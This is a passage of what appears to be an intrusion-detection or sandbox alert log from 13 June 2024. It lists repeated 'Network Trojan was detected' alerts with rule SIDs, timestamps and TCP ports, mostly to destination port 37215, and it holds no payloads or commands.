              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476571
              SID:2829579
              Source Port:40904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784999
              SID:2829579
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912155
              SID:2829579
              Source Port:54096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096724
              SID:2829579
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137854
              SID:2829579
              Source Port:58672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437830
              SID:2829579
              Source Port:43048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458108
              SID:2829579
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322805
              SID:2829579
              Source Port:37604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417065
              SID:2835222
              Source Port:53358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416687
              SID:2835222
              Source Port:50880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199971
              SID:2829579
              Source Port:57610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440516
              SID:2829579
              Source Port:60286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222842
              SID:2835222
              Source Port:50184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936119
              SID:2829579
              Source Port:40172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887769
              SID:2829579
              Source Port:33810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043736
              SID:2829579
              Source Port:36278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551851
              SID:2835222
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975464
              SID:2835222
              Source Port:46654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358268
              SID:2835222
              Source Port:32770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869622
              SID:2829579
              Source Port:39384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214380
              SID:2835222
              Source Port:55232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839693
              SID:2835222
              Source Port:35894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569495
              SID:2829579
              Source Port:54170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196326
              SID:2829579
              Source Port:60674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404235
              SID:2829579
              Source Port:58614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297298
              SID:2835222
              Source Port:53980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089163
              SID:2835222
              Source Port:60696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486818
              SID:2829579
              Source Port:39566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485638
              SID:2829579
              Source Port:34122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564239
              SID:2829579
              Source Port:59752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457389
              SID:2829579
              Source Port:34480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211991
              SID:2829579
              Source Port:49846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729446
              SID:2835222
              Source Port:50074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212474
              SID:2835222
              Source Port:48072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196832
              SID:2835222
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569313
              SID:2835222
              Source Port:41814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552930
              SID:2829579
              Source Port:54534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276120
              SID:2829579
              Source Port:42508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729011
              SID:2829579
              Source Port:56312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658463
              SID:2835222
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244795
              SID:2835222
              Source Port:45994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409389
              SID:2835222
              Source Port:53920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159433
              SID:2829579
              Source Port:47184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016917
              SID:2829579
              Source Port:55946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632749
              SID:2835222
              Source Port:36690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669851
              SID:2829579
              Source Port:57524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510109
              SID:2829579
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912828
              SID:2835222
              Source Port:38458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656357
              SID:2829579
              Source Port:45134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729852
              SID:2835222
              Source Port:46284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200207
              SID:2835222
              Source Port:52860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440202
              SID:2835222
              Source Port:33368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566239
              SID:2829579
              Source Port:48546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658725
              SID:2835222
              Source Port:57148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870407
              SID:2829579
              Source Port:47594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196588
              SID:2829579
              Source Port:35132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478554
              SID:2829579
              Source Port:38782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299264
              SID:2829579
              Source Port:47942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987385
              SID:2835222
              Source Port:48516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485956
              SID:2835222
              Source Port:54210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458123
              SID:2829579
              Source Port:56360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199622
              SID:2835222
              Source Port:36364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195696
              SID:2829579
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672572
              SID:2835222
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378017
              SID:2829579
              Source Port:48726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090678
              SID:2829579
              Source Port:44200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838417
              SID:2835222
              Source Port:36332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167713
              SID:2835222
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274208
              SID:2829579
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990606
              SID:2829579
              Source Port:58620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223862
              SID:2835222
              Source Port:46198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302542
              SID:2835222
              Source Port:39892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357565
              SID:2829579
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270996
              SID:2829579
              Source Port:40126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819832
              SID:2829579
              Source Port:58612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791704
              SID:2835222
              Source Port:53178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176642
              SID:2835222
              Source Port:44894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195259
              SID:2829579
              Source Port:39742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675577
              SID:2829579
              Source Port:50206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822239
              SID:2829579
              Source Port:51298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177304
              SID:2835222
              Source Port:41006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248633
              SID:2829579
              Source Port:41252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784939
              SID:2835222
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821508
              SID:2835222
              Source Port:58290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166290
              SID:2829579
              Source Port:36154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564576
              SID:2829579
              Source Port:58284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253478
              SID:2835222
              Source Port:50096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614170
              SID:2829579
              Source Port:41532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832882
              SID:2829579
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671908
              SID:2835222
              Source Port:60528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238778
              SID:2835222
              Source Port:35704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126647
              SID:2829579
              Source Port:37738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909420
              SID:2835222
              Source Port:54410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075094
              SID:2835222
              Source Port:58968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199058
              SID:2835222
              Source Port:43922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199691
              SID:2829579
              Source Port:42356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298310
              SID:2835222
              Source Port:54834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346569
              SID:2829579
              Source Port:51990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416242
              SID:2835222
              Source Port:33114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695355
              SID:2829579
              Source Port:48132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993953
              SID:2829579
              Source Port:34702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320023
              SID:2835222
              Source Port:45726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221809
              SID:2835222
              Source Port:55196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935623
              SID:2829579
              Source Port:33188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303695
              SID:2835222
              Source Port:52232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422547
              SID:2835222
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869128
              SID:2829579
              Source Port:37448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048758
              SID:2835222
              Source Port:44850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025516
              SID:2835222
              Source Port:45114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277881
              SID:2835222
              Source Port:58916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099712
              SID:2835222
              Source Port:45436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172741
              SID:2835222
              Source Port:33852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156467
              SID:2829579
              Source Port:48982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077974
              SID:2835222
              Source Port:49614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823053
              SID:2835222
              Source Port:60288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632866
              SID:2835222
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440884
              SID:2835222
              Source Port:34386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756351
              SID:2829579
              Source Port:41708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401290
              SID:2835222
              Source Port:41952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833687
              SID:2835222
              Source Port:48332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373238
              SID:2829579
              Source Port:34310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555698
              SID:2835222
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013558
              SID:2829579
              Source Port:41662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377813
              SID:2835222
              Source Port:49128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077205
              SID:2829579
              Source Port:60770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912258
              SID:2835222
              Source Port:34990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457601
              SID:2829579
              Source Port:49814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155300
              SID:2829579
              Source Port:54818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098873
              SID:2829579
              Source Port:48630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546181
              SID:2835222
              Source Port:54328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565173
              SID:2829579
              Source Port:35216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017278
              SID:2829579
              Source Port:38014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914159
              SID:2835222
              Source Port:39212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975709
              SID:2829579
              Source Port:57444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371112
              SID:2835222
              Source Port:47378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110232
              SID:2829579
              Source Port:59400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160571
              SID:2829579
              Source Port:37934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279138
              SID:2835222
              Source Port:50730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657624
              SID:2835222
              Source Port:48648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087368
              SID:2835222
              Source Port:38184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060258
              SID:2829579
              Source Port:38116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440022
              SID:2829579
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453514
              SID:2835222
              Source Port:34828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344168
              SID:2829579
              Source Port:52874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303649
              SID:2829579
              Source Port:35540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555901
              SID:2829579
              Source Port:55922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402430
              SID:2829579
              Source Port:35632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677272
              SID:2829579
              Source Port:53640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191532
              SID:2829579
              Source Port:41796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025884
              SID:2835222
              Source Port:51742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787911
              SID:2829579
              Source Port:41654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914780
              SID:2829579
              Source Port:50894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175914
              SID:2835222
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989635
              SID:2835222
              Source Port:33892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307561
              SID:2835222
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568541
              SID:2835222
              Source Port:53480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023729
              SID:2835222
              Source Port:57470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819673
              SID:2829579
              Source Port:34122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728689
              SID:2835222
              Source Port:49374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227929
              SID:2835222
              Source Port:44326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832965
              SID:2829579
              Source Port:39408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486665
              SID:2829579
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298698
              SID:2835222
              Source Port:50276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555211
              SID:2829579
              Source Port:40884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088237
              SID:2835222
              Source Port:50742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506177
              SID:2835222
              Source Port:36874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487487
              SID:2829579
              Source Port:40776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970065
              SID:2829579
              Source Port:56316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077024
              SID:2835222
              Source Port:39606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091813
              SID:2835222
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611281
              SID:2829579
              Source Port:42498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805525
              SID:2829579
              Source Port:45694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304952
              SID:2829579
              Source Port:42560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417154
              SID:2829579
              Source Port:36390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155881
              SID:2835222
              Source Port:47412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758191
              SID:2829579
              Source Port:54796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375417
              SID:2835222
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502412
              SID:2829579
              Source Port:42752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407388
              SID:2835222
              Source Port:43686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420247
              SID:2835222
              Source Port:41352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.529888
              SID:2840516
              Source Port:4554
              Destination Port:34096
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420184
              SID:2835222
              Source Port:52608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870796
              SID:2829579
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197302
              SID:2829579
              Source Port:32994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711691
              SID:2829579
              Source Port:37060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564532
              SID:2835222
              Source Port:53750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932430
              SID:2829579
              Source Port:36100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488274
              SID:2829579
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228210
              SID:2829579
              Source Port:41334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160187
              SID:2829579
              Source Port:37626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040309
              SID:2835222
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128591
              SID:2829579
              Source Port:47440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375107
              SID:2829579
              Source Port:34362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613901
              SID:2829579
              Source Port:39216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710092
              SID:2829579
              Source Port:58358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193836
              SID:2829579
              Source Port:37866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679837
              SID:2829579
              Source Port:56986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
